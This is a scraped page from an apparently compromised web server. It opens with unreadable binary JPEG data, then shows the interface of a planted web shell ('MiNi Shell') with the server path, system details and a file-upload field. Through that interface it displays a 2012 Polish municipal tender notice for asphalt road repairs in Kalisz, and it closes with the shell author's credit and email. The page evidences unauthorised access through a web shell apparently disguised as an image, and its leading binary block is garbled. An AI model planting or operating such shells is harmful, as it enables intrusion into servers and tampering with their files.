JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/80183-N-2012.html

<p class="kh_header"><b>Kalisz: Wykonanie na ulicach miasta Kalisza:
1/  remontu nawierzchni bitumicznych  emulsją i grysami przy     
      użyciu remontera oraz,
2/  uszczelnienia nawierzchni bitumicznych poprzez 
      powierzchniowe utrwalenie przy użyciu emulsji i grysów 
      frakcji 2/5 mm wbudowanych  za pomocą kombajnu</b><br>
<b>Numer ogłoszenia: 80183 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Złota 43, 62-800 Kalisz, woj. wielkopolskie, tel. 62 59 85 200, faks 62 59 85 201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie na ulicach miasta Kalisza:
1/  remontu nawierzchni bitumicznych  emulsją i grysami przy     
      użyciu remontera oraz,
2/  uszczelnienia nawierzchni bitumicznych poprzez 
      powierzchniowe utrwalenie przy użyciu emulsji i grysów 
      frakcji 2/5 mm wbudowanych  za pomocą kombajnu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zgodnie z zapisami pkt. 4.1. siwz: 4.1. Przedmiotem zamówienia jest: 
Wykonanie na ulicach miasta Kalisza:
1/  remontu nawierzchni bitumicznych  emulsją i grysami przy     
      użyciu remontera oraz,
2/  uszczelnienia nawierzchni bitumicznych poprzez 
      powierzchniowe utrwalenie przy użyciu emulsji i grysów 
      frakcji 2/5 mm wbudowanych  za pomocą kombajnu.

4.1.1.Wykonanie remontu nawierzchni bitumicznych emulsją i grysami przy użyciu 
        remontera należy wykonać przy użyciu:
       4.1.1.1. emulsji asfaltowej kationowej szybkorozpadowej klasy K1-65,
       4.1.1.2. grysów bazaltowych  o frakcji 2-5 mm i 2-8 mm  
                   Uwaga: frakcje 2-8 należy stosować przy większych głębokościach 
                   wyboju.
       4.1.1.3. Przedmiotowy remont nawierzchni bitumicznych należy wykonać 
                   samochodem - remonterem typu Patcher przystosowanym do oczyszczenia  
                   naprawianego  miejsca i wbudowania grysów kamiennych otoczonych 
                   emulsją asfaltową pod ciśnieniem  
       4.1.1.4. Przewidywana ilość materiału przeznaczonego do wbudowania wynosi 
                    ok. 80,6 Mg. 
4.1.2. Wykonanie uszczelnienia nawierzchni bitumicznych poprzez powierzchniowe 
          utrwalenie przy użyciu emulsji i grysów  za pomocą kombajnu.
         4.1.2.1.  Zakres prac do wykonania na poszczególnych ulicach obejmował będzie pasy 
                       o szerokości mniejszej niż pas ruchu  oraz na całej szerokości jezdni. 
                       Odcinki wymagające naprawy zostaną  wskazane przez inspektora nadzoru.
         4.1.2.2.  Przedmiot zamówienia należy wykonać przy użyciu grysów bazaltowych 
                       frakcji 2/5 mm i emulsji kationowej K1-70  modyfikowanej lateksem
         4.1.2.3. Remontowanym powierzchniom należy nadać regularne kształty.
         4.1.2.4. Przewidywany zakres do wykonania ok. 43.900 m2.
4.1.3. Zamawiający zastrzega sobie  prawo zwiększenia bądź zmniejszenia zakresu 
          o którym mowa powyżej w pkt. 4.1.1.4 i pkt. 4.1.2.4., w ramach środków 
          zabezpieczonych na realizację  zamówienia.
4.1.4. Zakres niezbędny do wykonania zostanie wskazany przez inspektora nadzoru  
          wyznaczonego przez Zamawiającego w dniu przekazania placu budowy.
4.1.5. Wykonawca jest zobowiązany opracować projekt organizacji ruchu na czas 
         prowadzonych robót . 
4.1.6.Przedmiot zamówienia należy wykonać zgodnie z Siwz i szczegółową specyfikacja 
         techniczną stanowiącą załącznik do Siwz.
4.2. Przy realizacji zamówienia Wykonawca będzie zobowiązany do stosowania 
       jedynie wyrobów dopuszczonych do używania w budownictwie w rozumieniu 
       ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006r. Nr 156, poz. 
      1118 z późn. zm.) oraz ustawy o wyrobach budowlanych (Dz. U. z 2004r. Nr 92, 
      poz. 881) oraz innych przepisów, o ile mają zastosowanie.
4.3. W przypadku użycia w załącznikach do niniejszej SIWZ nazw materiałów,
       producentów czy znaków towarowych należy je traktować jako przykładowe,   
       mające na celu doprecyzowanie przedmiotu zamówienia oraz określające 
       standard techniczny i jakościowy. 
4.4. Materiały do wykonania zamówienia należy przyjmować w kategorii
        i jakości nie niższej (równoważne) niż te wskazane w SIWZ i załącznikach
       do niej.

4.5. Wykonawca odpowiedzialny jest za powstałe w toku własnych prac odpady
       oraz za właściwy sposób postępowania z nimi, zgodnie z przepisami ustawy
       z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2007r. Nr 39, poz. 251 ze zm.)  
       oraz ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku 
       w gminach (Dz. U. z 2005r. Nr 236, poz. 2007 z późn. zm.). 
       Wywóz odpadów budowlanych odbywa się na koszt Wykonawcy.
4.6. Zamawiający wymaga udzielenia gwarancji  na wykonany przedmiot
     zamówienia na okres nie krótszy niż 24 miesiące od daty odbioru 
     końcowego.
4.7.Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym przedmiotem
      zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 4.500,00 PLN (cztery tysiące pięćset złotych 00/100) przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykażą w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli
       okres prowadzenia działalności jest krótszy - w tym okresie wykonanie minimum 
       1 zadania  polegającego na wykonaniu powierzchniowego  utrwalenia przy użyciu 
       emulsji i grysów  frakcji 2/5 mm wbudowanych   za pomocą kombajnu na powierzchni 
       minimum   20 000 m2.
  b/ wykażą w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli
       okres prowadzenia działalności jest krótszy - w tym okresie wykonanie minimum 
       1 zadania  o wartości minimum 30.000 zł polegającego na wykonaniu remontów 
       remonterem.
     Zamawiający wymaga, aby roboty te zostały wykonane zgodnie z zasadami 
     sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wskażą że dysponują lub będą dysponować co najmniej następującymi narzędziami 
   i urządzeniami niezbędnymi do wykonania zamówienia tj.:
       - remonter typu Patcher						- 1 szt.
       - kombajn do powierzchniowego utrwalenia nawierzchni 		- 1 szt.
       - walec ogumiony 							- 1 szt.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-wykażą, że posiadają (aktualne i opłacone przynajmniej na dzień składania ofert)
  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
  działalności gospodarczej związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisem pkt 5 siwz: 5.	Termin wykonania zamówienia: w ciągu  2 tygodni (14 dni) od daty zawarcia umowy.
      Zamawiający dopuszcza możliwość zmiany terminu wykonania 
      przedmiotu zamówienia w przypadku wystąpienia niekorzystnych warunków 
        atmosferycznych  uniemożliwiających realizację robót o czas ich trwania.
Zgodnie z zapisem pkt. 21.3 siwz: 21.3. Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści  oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących  przypadkach:
21.3.1/ zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta wpływa  
            na zakres lub warunki wykonania przez strony świadczeń wynikających 
            z umowy;
         21.3.2/ zmiana ta jest korzystna dla Zamawiającego
         21.3.3/ zaistniały nowe okoliczności, których nie można było przewidzieć w dniu 
                     zawarcia  umowy tj.: wystąpienie niekorzystnych warunków atmosferycznych 
                     uniemożliwiających realizację robót o czas ich trwania
Zgodnie z zapisem pafagrafu 17 Projektu umowy: § 17
1.Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod 
   rygorem nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności
   z regulacjami zawartymi w ustawie Prawo zamówień publicznych. 
2.Zamawiający dopuszcza zmianę treści zawartej umowy w następujących 
   przypadkach:
a) zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta wpływa
    na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy;
b) zmian w zakresie parametrów techniczno - eksploatacyjnych urządzeń, warunków
    gwarancji, o ile są one dla Zamawiającego korzystne (nie gorsze od zawartych
    w ofercie Wykonawcy) i obiektywnie uzasadnione.
3.W sprawach nieuregulowanych niniejszą umową mają zastosowanie odpowiednie     
   przepisy Kodeksu Cywilnego, Prawa budowlanego, o ile przepisy ustawy Prawo 
   zamówień publicznych nie stanowią inaczej.
4.Ewentualne spory mogące wyniknąć z realizacji niniejszej umowy strony 
   zobowiązują się rozwiązywać polubownie, w drodze negocjacji. 
   W razie braku porozumienia spory będzie rozstrzygał sąd powszechny właściwy 
   dla siedziby Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich ul. Złota 43, 62-800 Kalisz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 12:00, miejsce: Zarząd Dróg Miejskich ul. Złota 43, 62-800 Kalisz, sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com